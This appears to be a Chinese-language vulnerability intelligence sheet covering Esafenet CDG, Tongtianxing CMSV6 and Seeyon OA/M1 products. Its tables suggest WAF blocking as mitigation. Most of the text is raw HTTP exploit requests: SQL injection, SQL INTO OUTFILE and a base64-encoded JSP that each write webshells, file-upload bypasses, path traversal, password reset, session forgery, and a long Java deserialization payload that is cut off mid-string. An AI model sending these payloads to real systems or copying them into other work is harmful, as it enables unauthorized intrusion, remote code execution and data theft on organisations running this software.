POST /CDGServer3/openapi/getAllUsers HTTP/1.1
Host:
pageSize=10000&pageNumber=1
POST /CDGServer3/rpc/userManage/userPwdReset.js HTTP/1.1
Host:
userIds=test
亿赛通电子文档安全管理系统 LogDownLoadService sql注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/CDGServer3/logManagement/LogDownLoadService |
WAF封禁路路径,等待发布补丁 |
0816 |
1day |
利用路径
POST /CDGServer3/logManagement/LogDownLoadService HTTP/1.1
Host:
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
command=downLoadLogFiles&currPage=1&fromurl=../user/dataSearch.jsp&logFileName=indsex.txt&id=-1';WAITFOR DELAY '0:0:6'--
通天星
通天星 CMSV6 车载定位监控平台 disable SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/edu?security?officer/disable;downloadLogger.action |
WAF封禁路径,等待发布补丁 |
722 |
未知 |
漏洞详情
GET /edu?security?officer/disable;downloadLogger.action?ids=1+AND+%28SELECT+2688+FROM+%28SELECT%28SLEEP%285%29%29%29kOli%29 HTTP/1.1
通天星-主动安全监控云平台-RCE
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
version <= V7.32.0.2 |
未知 |
等着 |
726 |
nday |
漏洞详情
未知
通天星 CMSV6 车载定位监控平台 merge 远程代码执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/point_manage/merge |
WAF封禁路路径,等待发布补丁 |
807 |
1day |
漏洞详情
POST /point_manage/merge HTTP/1.1
Host:
id=1&name=1' UNION SELECT%0aNULL, 0x3c253d202268656c6c6f2220253e,NULL,NULL,NULL,NULL,NULL,NULL
INTO dumpfile '../../tomcat/webapps/gpsweb/YNFHiRkD.jsp' FROMuser_sessiona
WHERE '1 '='1
&type=3&map_id=4&install_place=5&check_item=6&create_time=7&update_ti
me=8
通天星 CMSV6 车载定位监控平台 SQL 注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/run_stop/delete.do |
WAF封禁路路径,等待发布补丁 |
807 |
1day |
漏洞详情
GET /run_stop/delete.do;downloadLogger.action?ids=1%29+union+select+0x3c25206f75742e7072696e746c6e282276756c22293b20253e+into+OUTFILE+%27..%2F..%2Ftomcat%2Fwebapps%2Fgpsweb%2Fvuln.jsp%27+--+a&loadAll=1 HTTP/1.1
Host:
通天星CMSV6车载视频监控平台SESSION伪造漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
未知 |
/808gps/LocationManagement/UserSessionAction_saveUserSession.action |
WAF封禁路路径,等待发布补丁 |
807 |
nday |
漏洞详情
POST /808gps/LocationManagement/UserSessionAction_saveUserSession.action HTTP/1.1
userSession=42AA7A2BE767123A42E1530ACC920781&amp;id=4
致远
致远在野 nday constDef接囗存在代码执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/seeyon/constDefdo |
WAF封禁路径,等待发布补丁 |
722 |
nday |
漏洞详情
GET /seeyon/constDefdo?method=newConstDef&constKey=asdasd&constDefine=$demo%20%22;new%20File(%22./webapps/ROOT/1111.jsp%22).write(new%20String(Base64.getDecoder0.decode%22PCUKaWYocmVxdWVzdC5nZXRQYXJhbWV0ZXlolmYiKSE9bnVsbCkobmV3lGphdmEuaW8uRmlsZU91dHB1dFN0cmVhbShhcHBsaWNhdGlvbi5nZXRSZWFSUGF0aCgiXFwiKStyZXF1ZXN0LmdldFBhcmFtZXRlcigiZilpKSkud3JpdGUocmVxdWVzdC5nZXRQYXJhbWV0ZXlolnQiKs5nZXRCeXRIcygpKTSKJT4=%22));%22&constDescription=123&constType=4 HTTP/1.1
致远 OA fileUpload.do 前台文件上传绕过漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/seeyon/autoinstall.do/../../seeyon/fileUpload.do? |
|
|
|
| /seeyon/autoinstall.do/../../seeyon/privilege/menu.do |
使用WAF进行拦截 |
722 |
nday |
|
|
漏洞详情
POST /seeyon/autoinstall.do/../../seeyon/fileUpload.do?method=processUpload HTTP/1.1
Host:
AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287c9dfb30)
--00content0boundary00
--00content0boundary00
--00content0boundary00
--00content0boundary00
--00content0boundary00
--00content0boundary00
--00content0boundary00
false
--00content0boundary00
<% out.println("hello");%>
--00content0boundary00
POST /seeyon/autoinstall.do/../../seeyon/privilege/menu.do HTTP/1.1
Host:
SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)
method=uploadMenuIcon&fileid=ID 值&filename=qwe.jsp
致远AnalyticsCloud 分析云存在任意文件读取漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
未知 |
/ |
使用WAF进行拦截 |
723 |
nday |
漏洞详情
GET /.%252e/.%252e/c:/windows/win.ini HTTP/1.1
致远互联-M1移动协同办公管理软件-RCE
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/esn_mobile_pns/service/userTokenService |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
POST /esn_mobile_pns/service/userTokenService HTTP/1.1
{{base64dec(rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAA2Zvb3NyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABHNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQB+AAN4cHZyACBqYXZheC5zY3JpcHQuU2NyaXB0RW5naW5lTWFuYWdlcgAAAAAAAAAAAAAAeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAHQAC25ld0luc3RhbmNldXIAEltMamF2YS5sYW5nLkNsYXNzO6sW167LzVqZAgAAeHAAAAAAc3EAfgATdXEAfgAYAAAAAXQAAmpzdAAPZ2V0RW5naW5lQnlOYW1ldXEAfgAbAAAAAXZyABBqYXZhLmxhbmcuU3RyaW5noPCkOHo7s0ICAAB4cHNxAH4AE3VxAH4AGAAAAAF0LWx0cnkgewogIGxvYWQoIm5hc2hvcm46bW96aWxsYV9jb21wYXQuanMiKTsKfSBjYXRjaCAoZSkge30KZnVuY3Rpb24gZ2V0VW5zYWZlKCl7CiAgdmFyIHRoZVVuc2FmZU1ldGhvZCA9IGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJzdW4ubWlzYy5VbnNhZmUiKS5nZXREZWNsYXJlZEZpZWxkKCd0aGVVbnNhZmUnKTsKICB0aGVVbnNhZmVNZXRob2Quc2V0QWNjZXNzaWJsZSh0cnVlKTsgCiAgcmV0dXJuIHRoZVVuc2FmZU1ldGhvZC5nZXQobnVsbCk7Cn0KZnVuY3Rpb24gcmVtb3ZlQ2xhc3NDYWNoZShjbGF6eil7CiAgdmFyIHVuc2FmZSA9IGdldFVuc2FmZSgpOwogIHZhciBjbGF6ekFub255bW91c0NsYXNzID0gdW5zYWZlLmRlZmluZUFub255bW91c0NsYXNzKGNsYXp6LGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJqYXZhLmxhbmcuQ2xhc3MiKS5nZXRSZXNvdXJjZUFzU3RyZWFtKCJDbGFzcy5jbGFzcyIpLnJlYWRBbGxCeXRlcygpLG51bGwpOwogIHZhciByZWZsZWN0aW9uRGF0YUZpZWxkID0gY2xhenpBbm9ueW1vdXNDbGFzcy5nZXREZWNsYXJlZEZpZWxkKCJyZWZsZWN0aW9uRGF0YSIpOwogIHVuc2FmZS5wdXRPYmplY3QoY2xhenosdW5zYWZlLm9iamVjdEZpZWxkT2Zmc2V0KHJlZmxlY3Rpb25EYXRhRmllbGQpLG51bGwpOwp9CmZ1bmN0aW9uIGJ5cGFzc1JlZmxlY3Rpb25GaWx0ZXIoKSB7CiAgdmFyIHJlZmxlY3Rpb25DbGFzczsKICB0cnkgewogICAgcmVmbGVjdGlvbkNsYXNzID0gamF2YS5sYW5nLkNsYXNzLmZvck5hbWUoImpkay5pbnRlcm5hbC5yZWZsZWN0LlJlZmxlY3Rpb24iKTsKICB9IGNhdGNoIChlcnJvcikgewogICAgcmVmbGVjdGlvbkNsYXNzID0gamF2YS5sYW5nLkNsYXNzLmZvck5hbWUoInN1bi5yZWZsZWN0LlJlZmxlY3Rpb24iKTsKICB9CiAgdmFyIHVuc2FmZSA9IGdldFVuc2FmZSgpOwogIHZhciBjbGFzc0J1ZmZlciA9IHJlZmxlY3Rpb25DbGFzcy5nZXRSZXNvdXJjZUFzU3RyZWFtKCJSZWZsZWN0aW9uLmNsYXNzIikucmVhZEFsbEJ5dGVzKCk7CiAgdmFyIHJlZmxlY3Rpb25Bbm9ueW1vdXNDbGFzcyA9IHVuc2FmZS5kZWZpbmVBbm9ueW1vdXNDbGFzcyhyZWZsZWN0aW9uQ2xhc3MsIGNsYXNzQnVmZmVyLCBudWxsKTsKICB2YXIgZmllbGRGaWx0ZXJNYXBGaWVsZCA9IHJlZmxlY3Rpb25Bbm9ueW1vdXNDbGFzcy5nZXREZWNsYXJlZEZpZWxkKCJmaWVsZEZpbHRlck1hcCIpOwogIHZhciBtZXRob2RGaWx0ZXJNYXBGaWVsZCA9IHJlZmxlY3Rpb25Bbm9ueW1vdXNDbGFzcy5nZXREZWNsYXJlZEZpZWxkKCJtZXRob2RGaWx0ZXJNYXAiKTsKICBpZiAoZmllbGRGaWx0ZXJNYXBGaWVsZC5nZXRUeXBlKCkuaXNBc3NpZ25hYmxlRnJvbShqYXZhLmxhbmcuQ2xhc3MuZm9yTmFtZSgiamF2YS51dGlsLkhhc2hNYXAiKSkpIHsKICAgIHVuc2FmZS5wdXRPYmplY3QocmVmbGVjdGlvbkNsYXNzLCB1bnNhZmUuc3RhdGljRmllbGRPZmZzZXQoZmllbGRGaWx0ZXJNYXBGaWVsZCksIGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJqYXZhLnV0aWwuSGFzaE1hcCIpLmdldENvbnN0cnVjdG9yKCkubmV3SW5zdGFuY2UoKSk7CiAgfQogIGlmIChtZXRob2RGaWx0ZXJNYXBGaWVsZC5nZXRUeXBlKCkuaXNBc3NpZ25hYmxlRnJvbShqYXZhLmxhbmcuQ2xhc3MuZm9yTmFtZSgiamF2YS51dGlsLkhhc2hNYXAiKSkpIHsKICAgIHVuc2FmZS5wdXRPYmplY3QocmVmbGVjdGlvbkNsYXNzLCB1bnNhZmUuc3RhdGljRmllbGRPZmZzZXQobWV0aG9kRmlsdGVyTWFwRmllbGQpLCBqYXZhLmxhbmcuQ2xhc3MuZm9yTmFtZSgiamF2YS51dGlsLkhhc2hNYXAiKS5nZXRDb25zdHJ1Y3RvcigpLm5ld0luc3RhbmNlKCkpOwogIH0KICByZW1vdmVDbGFzc0NhY2hlKGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJqYXZhLmxhbmcuQ2xhc3MiKSk7Cn0KZnVuY3Rpb24gc2V0QWNjZXNzaWJsZShhY2Nlc3NpYmxlT2JqZWN0KXsKICAgIHZhciB1bnNhZmUgPSBnZXRVbnNhZmUoKTsKICAgIHZhciBvdmVycmlkZUZpZWxkID0gamF2YS5sYW5nLkNsYXNzLmZvck5hbWUoImphdmEubGFuZy5yZWZsZWN0LkFjY2Vzc2libGVPYmplY3QiKS5nZXREZWNsYXJlZEZpZWxkKCJvdmVycmlkZSIpOwogICAgdmFyIG9mZnNldCA9IHVuc2FmZS5vYmplY3RGaWVsZE9mZnNldChvdmVycmlkZUZpZWxkKTsKICAgIHVuc2FmZS5wdXRCb29sZWFuKGFjY2Vzc2libGVPYmplY3QsIG9mZnNldCwgdHJ1ZSk7Cn0KZnVuY3Rpb24gZGVmaW5lQ2xhc3MoYnl0ZXMpewogIHZhciBjbHogPSBudWxsOwogIHZhciB2ZXJzaW9uID0gamF2YS5sYW5nLlN5c3RlbS5nZXRQcm9wZXJ0eSgiamF2YS52ZXJzaW9uIik7CiAgdmFyIHVuc2FmZSA9IGdldFVuc2FmZSgpCiAgdmFyIGNsYXNzTG9hZGVyID0gbmV3IGphdmEubmV0LlVSTENsYXNzTG9hZGVyKGphdmEubGFuZy5yZWZsZWN0LkFycmF5Lm5ld0luc3RhbmNlKGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJqYXZhLm5ldC5VUkwiKSwgMCkpOwogIHRyeXsKICAgIGlmICh2ZXJzaW9uLnNwbGl0KCIuIilbMF0gPj0gMTEpIHsKICAgICAgYnlwYXNzUmVmbGVjdGlvbkZpbHRlcigpOwogICAgZGVmaW5lQ2xhc3NNZXRob2QgPSBqYXZhLmxhbmcuQ2xhc3MuZm9yTmFtZSgiamF2YS5sYW5nLkNsYXNzTG9hZGVyIikuZ2V0RGVjbGFyZWRNZXRob2QoImRlZmluZUNsYXNzIiwgamF2YS5sYW5nLkNsYXNzLmZvck5hbWUoIltCIiksamF2YS5sYW5nLkludGVnZXIuVFlQRSwgamF2YS5sYW5nLkludGVnZXIuVFlQRSk7CiAgICBzZXRBY2Nlc3NpYmxlKGRlZmluZUNsYXNzTWV0aG9kKTsKICAgIC8vIOe7lei/hyBzZXRBY2Nlc3NpYmxlIAogICAgY2x6ID0gZGVmaW5lQ2xhc3NNZXRob2QuaW52b2tlKGNsYXNzTG9hZGVyLCBieXRlcywgMCwgYnl0ZXMubGVuZ3RoKTsKICAgIH1lbHNlewogICAgICB2YXIgcHJvdGVjdGlvbkRvbWFpbiA9IG5ldyBqYXZhLnNlY3VyaXR5LlByb3RlY3Rpb25Eb21haW4obmV3IGphdmEuc2VjdXJpdHkuQ29kZVNvdXJjZShudWxsLCBqYXZhLmxhbmcucmVmbGVjdC5BcnJheS5uZXdJbnN0YW5jZShqYXZhLmxhbmcuQ2xhc3MuZm9yTmFtZSgiamF2YS5zZWN1cml0eS5jZXJ0LkNlcnRpZmljYXRlIiksIDApKSwgbnVsbCwgY2xhc3NMb2FkZXIsIFtdKTsKICAgICAgY2x6ID0gdW5zYWZlLmRlZmluZUNsYXNzKG51bGwsIGJ5dGVzLCAwLCBieXRlcy5sZW5ndGgsIGNsYXNzTG9hZGVyLCBwcm90ZWN0aW9uRG9tYWluKTsKICAgIH0KICB9Y2F0Y2goZXJyb3IpewogICAgZXJyb3IucHJpbnRTdGFja1RyYWNlKCk7CiAgfWZpbmFsbHl7CiAgICByZXR1cm4gY2x6OwogIH0KfQpmdW5jdGlvbiBiYXNlNjREZWNvZGVUb0J5dGUoc3RyKSB7CiAgdmFyIGJ0OwogIHRyeSB7CiAgICBidCA9IGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJzdW4ubWlzYy5CQVNFNjREZWNvZGVyIikubmV3SW5zdGFuY2UoKS5kZWNvZGVCdWZmZXIoc3RyKTsKICB9IGNhdGNoIChlKSB7CiAgICBidCA9IGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJqYXZhLnV0aWwuQmFzZTY0IikubmV3SW5zdGFuY2UoKS5nZXREZWNvZGVyKCkuZGVjb2RlKHN0cik7CiAgfQogIHJldHVybiBidDsKfQp2YXIgY29kZT0ieXY2NnZnQUFBQzhCWndvQUlBQ1NCd0NUQndDVUNnQUNBSlVLQUFNQWxnb0FJZ0NYQ2dDWUFKa0tBSmdBbWdvQUlnQ2JDQUNjQ2dBZ0FKMEtBSjRBbndvQW5nQ2dCd0NoQ2dDWUFLSUlBSXdLQUNrQW93Z0FwQWdBcFFjQXBnZ0Fwd2dBcUFjQXFRb0FJQUNxQ0FDckNBQ3NCd0N0Q3dBYkFLNExBQnNBcndnQXNBZ0FzUWNBc2dvQUlBQ3pCd0MwQ2dDMUFMWUlBTGNKQUg0QXVBZ0F1UW9BZmdDNkNBQzdCd0M4Q2dCK0FMMEtBQ2tBdmdnQXZ3a0FMZ0RBQndEQkNnQXVBTUlJQU1NS0FINEF4QW9BSUFERkNBREdDUUIrQU1jSUFNZ0tBQ0FBeVFnQXlnY0F5d2dBekFnQXpRb0FtQURPQ2dEUEFNUUlBTkFLQUNrQTBRZ0EwZ29BS1FEVENBRFVDZ0FwQU5VS0FDa0ExZ2dBMXdvQUtRRFlDQURaQ2dBdUFOb0tBSDRBMndnQTNBb0FmZ0RkQ0FEZUNnRGZBT0FLQUNrQTRRZ0E0Z2dBNHdnQTVBY0E1UW9BVVFDWENnQlJBT1lJQU9jS0FGRUE2QWdBNlFnQTZnZ0E2d2dBN0FvQTdRRHVDZ0R0QU84SEFQQUtBUEVBOGdvQVhBRHpDQUQwQ2dCY0FQVUtBRndBOWdvQVhBRDNDZ0R4QVBnS0FQRUErUW9BT0FEb0NBRDZDZ0FwQUpZSUFQc0tBTzBBL0FjQS9Rb0FMZ0QrQ2dCcUFQOEtBR29BOGdvQThRRUFDZ0JxQVFBS0FHb0JBUW9CQWdFRENnRUNBUVFLQVFVQkJnb0JCUUVIQlFBQUFBQUFBQUF5Q2dDWUFRZ0tBUEVCQ1FvQWFnRUtDQUVMQ2dBNEFKVUlBUXdJQVEwSEFRNEJBQlpqYkdGemN5UnFZWFpoSkd4aGJtY2tVM1J5YVc1bkFRQVJUR3BoZG1FdmJHRnVaeTlEYkdGemN6c0JBQWxUZVc1MGFHVjBhV01CQUFkaGNuSmhlU1JDQVFBR1BHbHVhWFErQVFBREtDbFdBUUFFUTI5a1pRRUFEMHhwYm1WT2RXMWlaWEpVWVdKc1pRRUFDa1Y0WTJWd2RHbHZibk1CQUFsc2IyRmtRMnhoYzNNQkFDVW9UR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdLVXhxWVhaaEwyeGhibWN2UTJ4aGMzTTdBUUFIWlhobFkzVjBaUUVBSmloTWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzcFRHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN0FRQUVaWGhsWXdFQUIzSmxkbVZ5YzJVQkFEa29UR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdUR3BoZG1FdmJHRnVaeTlKYm5SbFoyVnlPeWxNYW1GMllTOXNZVzVuTDFOMGNtbHVaenNCQUFaamJHRnpjeVFCQUFwVGIzVnlZMlZHYVd4bEFRQUhRVFF1YW1GMllRd0JEd0NKQVFBZ2FtRjJZUzlzWVc1bkwwTnNZWE56VG05MFJtOTFibVJGZUdObGNIUnBiMjRCQUI1cVlYWmhMMnhoYm1jdlRtOURiR0Z6YzBSbFprWnZkVzVrUlhKeWIzSU1BUkFCRVF3QWd3RVNEQUNEQUlRSEFSTU1BUlFCRlF3QkZnRVhEQUVZQVJrQkFBZDBhSEpsWVdSekRBRWFBUnNIQVJ3TUFSMEJIZ3dCSHdFZ0FRQVRXMHhxWVhaaEwyeGhibWN2VkdoeVpXRmtPd3dCSVFFUkRBRWlBU01CQUFSb2RIUndBUUFHZEdGeVoyVjBBUUFTYW1GMllTOXNZVzVuTDFKMWJtNWhZbXhsQVFBR2RHaHBjeVF3QVFBSGFHRnVaR3hsY2dFQUhtcGhkbUV2YkdGdVp5OU9iMU4xWTJoR2FXVnNaRVY0WTJWd2RHbHZiZ3dCSkFFWkFRQUdaMnh2WW1Gc0FRQUtjSEp2WTJWemMyOXljd0VBRG1waGRtRXZkWFJwYkM5TWFYTjBEQUVsQVNZTUFSOEJKd0VBQTNKbGNRRUFDMmRsZEZKbGMzQnZibk5sQVFBUGFtRjJZUzlzWVc1bkwwTnNZWE56REFFb0FTa0JBQkJxWVhaaEwyeGhibWN2VDJKcVpXTjBCd0VxREFFckFTd0JBQWxuWlhSSVpXRmtaWElNQUg4QWdBRUFFR3BoZG1FdWJHRnVaeTVUZEhKcGJtY01BSThBaVFFQUEyTnRaQUVBRUdwaGRtRXZiR0Z1Wnk5VGRISnBibWNNQUlvQWl3d0JMUUV1QVFBSmMyVjBVM1JoZEhWekRBRXZBSUFCQUJGcVlYWmhMMnhoYm1jdlNXNTBaV2RsY2d3QWd3RXdBUUFrYjNKbkxtRndZV05vWlM1MGIyMWpZWFF1ZFhScGJDNWlkV1l1UW5sMFpVTm9kVzVyREFDSUFJa01BVEVCTWdFQUNITmxkRUo1ZEdWekRBQ0NBSUFCQUFKYlFnd0JNd0VwQVFBSFpHOVhjbWwwWlFFQUUycGhkbUV2YkdGdVp5OUZlR05sY0hScGIyNEJBQk5xWVhaaExtNXBieTVDZVhSbFFuVm1abVZ5QVFBRWQzSmhjQXdCTkFFMUJ3RTJBUUFBREFFM0FUZ0JBQkJqYjIxdFlXNWtJRzV2ZENCdWRXeHNEQUU1QVJFQkFBVWpJeU1qSXd3Qk9nRTdEQUU4QVQwQkFBRTZEQUUrQVQ4QkFDSmpiMjF0WVc1a0lISmxkbVZ5YzJVZ2FHOXpkQ0JtYjNKdFlYUWdaWEp5YjNJaERBRkFBVUVNQUkwQWpnRUFCVUJBUUVCQURBQ01BSXNCQUFkdmN5NXVZVzFsQndGQ0RBRkRBSXNNQVVRQkVRRUFBM2RwYmdFQUJIQnBibWNCQUFJdGJnRUFGbXBoZG1FdmJHRnVaeTlUZEhKcGJtZENkV1ptWlhJTUFVVUJSZ0VBQlNBdGJpQTBEQUZIQVJFQkFBSXZZd0VBQlNBdGRDQTBBUUFDYzJnQkFBSXRZd2NCU0F3QlNRRktEQUNNQVVzQkFCRnFZWFpoTDNWMGFXd3ZVMk5oYm01bGNnY0JUQXdCVFFGT0RBQ0RBVThCQUFKY1lRd0JVQUZSREFGU0FWTU1BVlFCRVF3QlZRRk9EQUZXQUlRQkFBY3ZZbWx1TDNOb0FRQUhZMjFrTG1WNFpRd0FqQUZYQVFBUGFtRjJZUzl1WlhRdlUyOWphMlYwREFGWUFTWU1BSU1CV1F3QldnRmJEQUZjQVZNSEFWME1BVjRCSmd3Qlh3RW1Cd0ZnREFGaEFUQU1BV0lBaEF3Qll3RmtEQUZsQVNZTUFXWUFoQUVBSFhKbGRtVnljMlVnWlhobFkzVjBaU0JsY25KdmNpd2diWE5uSUMwK0FRQUJJUUVBRTNKbGRtVnljMlVnWlhobFkzVjBaU0J2YXlFQkFBSkJOQUVBQjJadmNrNWhiV1VCQUFwblpYUk5aWE56WVdkbEFRQVVLQ2xNYW1GMllTOXNZVzVuTDFOMGNtbHVaenNCQUJVb1RHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN0tWWUJBQkJxWVhaaEwyeGhibWN2VkdoeVpXRmtBUUFOWTNWeWNtVnVkRlJvY21WaFpBRUFGQ2dwVEdwaGRtRXZiR0Z1Wnk5VWFISmxZV1E3QVFBT1oyVjBWR2h5WldGa1IzSnZkWEFCQUJrb0tVeHFZWFpoTDJ4aGJtY3ZWR2h5WldGa1IzSnZkWEE3QVFBSVoyVjBRMnhoYzNNQkFCTW9LVXhxWVhaaEwyeGhibWN2UTJ4aGMzTTdBUUFRWjJWMFJHVmpiR0Z5WldSR2FXVnNaQUVBTFNoTWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzcFRHcGhkbUV2YkdGdVp5OXlaV1pzWldOMEwwWnBaV3hrT3dFQUYycGhkbUV2YkdGdVp5OXlaV1pzWldOMEwwWnBaV3hrQVFBTmMyVjBRV05qWlhOemFXSnNaUUVBQkNoYUtWWUJBQU5uWlhRQkFDWW9UR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdLVXhxWVhaaEwyeGhibWN2VDJKcVpXTjBPd0VBQjJkbGRFNWhiV1VCQUFoamIyNTBZV2x1Y3dFQUd5aE1hbUYyWVM5c1lXNW5MME5vWVhKVFpYRjFaVzVqWlRzcFdnRUFEV2RsZEZOMWNHVnlZMnhoYzNNQkFBUnphWHBsQVFBREtDbEpBUUFWS0VrcFRHcGhkbUV2YkdGdVp5OVBZbXBsWTNRN0FRQUpaMlYwVFdWMGFHOWtBUUJBS0V4cVlYWmhMMnhoYm1jdlUzUnlhVzVuTzF0TWFtRjJZUzlzWVc1bkwwTnNZWE56T3lsTWFtRjJZUzlzWVc1bkwzSmxabXhsWTNRdlRXVjBhRzlrT3dFQUdHcGhkbUV2YkdGdVp5OXlaV1pzWldOMEwwMWxkR2h2WkFFQUJtbHVkbTlyWlFFQU9TaE1hbUYyWVM5c1lXNW5MMDlpYW1WamREdGJUR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdLVXhxWVhaaEwyeGhibWN2VDJKcVpXTjBPd0VBQ0dkbGRFSjVkR1Z6QVFBRUtDbGJRZ0VBQkZSWlVFVUJBQVFvU1NsV0FRQUxibVYzU1c1emRHRnVZMlVCQUJRb0tVeHFZWFpoTDJ4aGJtY3ZUMkpxWldOME93RUFFV2RsZEVSbFkyeGhjbVZrVFdWMGFHOWtBUUFWWjJWMFEyOXVkR1Y0ZEVOc1lYTnpURzloWkdWeUFRQVpLQ2xNYW1GMllTOXNZVzVuTDBOc1lYTnpURzloWkdWeU93RUFGV3BoZG1FdmJHRnVaeTlEYkdGemMweHZZV1JsY2dFQUJtVnhkV0ZzY3dFQUZTaE1hbUYyWVM5c1lXNW5MMDlpYW1WamREc3BXZ0VBQkhSeWFXMEJBQXB6ZEdGeWRITlhhWFJvQVFBVktFeHFZWFpoTDJ4aGJtY3ZVM1J5YVc1bk95bGFBUUFIY21Wd2JHRmpaUUVBUkNoTWFtRjJZUzlzWVc1bkwwTm9ZWEpUWlhGMVpXNWpaVHRNYW1GMllTOXNZVzVuTDBOb1lYSlRaWEYxWlc1alpUc3BUR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdBUUFGYzNCc2FYUUJBQ2NvVEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3S1Z0TWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzQkFBZDJZV3gxWlU5bUFRQW5LRXhxWVhaaEwyeGhibWN2VTNSeWFXNW5PeWxNYW1GMllTOXNZVzVuTDBsdWRHVm5aWEk3QVFBUWFtRjJZUzlzWVc1bkwxTjVjM1JsYlFFQUMyZGxkRkJ5YjNCbGNuUjVBUUFMZEc5TWIzZGxja05oYzJVQkFBWmhjSEJsYm1RQkFDd29UR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdLVXhxWVhaaEwyeGhibWN2VTNSeWFXNW5RblZtWm1WeU93RUFDSFJ2VTNSeWFXNW5BUUFSYW1GMllTOXNZVzVuTDFKMWJuUnBiV1VCQUFwblpYUlNkVzUwYVcxbEFRQVZLQ2xNYW1GMllTOXNZVzVuTDFKMWJuUnBiV1U3QVFBb0tGdE1hbUYyWVM5c1lXNW5MMU4wY21sdVp6c3BUR3BoZG1FdmJHRnVaeTlRY205alpYTnpPd0VBRVdwaGRtRXZiR0Z1Wnk5UWNtOWpaWE56QVFBT1oyVjBTVzV3ZFhSVGRISmxZVzBCQUJjb0tVeHFZWFpoTDJsdkwwbHVjSFYwVTNSeVpXRnRPd0VBR0NoTWFtRjJZUzlwYnk5SmJuQjFkRk4wY21WaGJUc3BWZ0VBREhWelpVUmxiR2x0YVhSbGNnRUFKeWhNYW1GMllTOXNZVzVuTDFOMGNtbHVaenNwVEdwaGRtRXZkWFJwYkM5VFkyRnVibVZ5T3dFQUIyaGhjMDVsZUhRQkFBTW9LVm9CQUFSdVpYaDBBUUFPWjJWMFJYSnliM0pUZEhKbFlXMEJBQWRrWlhOMGNtOTVBUUFuS0V4cVlYWmhMMnhoYm1jdlUzUnlhVzVuT3lsTWFtRjJZUzlzWVc1bkwxQnliMk5sYzNNN0FRQUlhVzUwVm1Gc2RXVUJBQllvVEdwaGRtRX